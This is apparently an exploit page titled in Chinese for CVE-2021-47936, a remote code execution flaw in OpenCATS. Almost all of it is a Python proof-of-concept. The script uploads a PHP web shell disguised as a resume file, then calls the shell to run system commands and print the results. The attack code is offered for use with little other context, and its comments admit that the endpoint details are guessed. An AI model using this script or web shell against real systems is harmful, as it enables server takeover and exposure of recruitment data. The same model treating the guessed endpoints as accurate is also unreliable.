CVE-2021-47936 OpenCATS远程代码执行漏洞

#!/usr/bin/env python3 # Proof of Concept for CVE-2021-47936 import requests def exploit(target_url): # 1. Upload malicious PHP file as resume upload_endpoint = f"{target_url}/index.php?m=candidates&a=add" # PHP payload to execute system commands php_payload = "<?php system($_GET['cmd']); ?>" files = { 'file': ('evil_resume.php', php_payload, 'application/octet-stream') } # Sample data required by the form (may need adjustment based on version) data = { 'isAjax': '1', 'candidateID': '0' } print("[*] Attempting to upload malicious resume...") try: # Note: Actual endpoint parameters might vary, this is a generic PoC structure response = requests.post(upload_endpoint, files=files, data=data) if response.status_code == 200: print("[+] Upload request sent successfully.") # 2. Execute the uploaded file # Assuming the file is saved in the upload directory with the original name exec_url = f"{target_url}/upload/evil_resume.php?cmd=whoami" print(f"[*] Triggering payload at: {exec_url}") exec_response = requests.get(exec_url) if exec_response.status_code == 200: print("[+] Command execution output:") print(exec_response.text) else: print("[-] Failed to execute payload.") else: print(f"[-] Upload failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://example.com/opencats" # Replace with actual target exploit(target)